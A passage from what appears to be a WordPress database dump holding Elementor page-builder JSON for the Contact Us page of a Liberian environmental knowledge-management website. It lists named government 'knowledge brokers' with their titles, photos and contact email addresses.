armorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(15984,2417,'_elementor_edit_mode','builder'),(15985,2417,'_elementor_template_type','wp-page'),(15986,2417,'_elementor_version','2.7.5'),(15987,2417,'_wp_page_template','default'),(15988,2417,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. 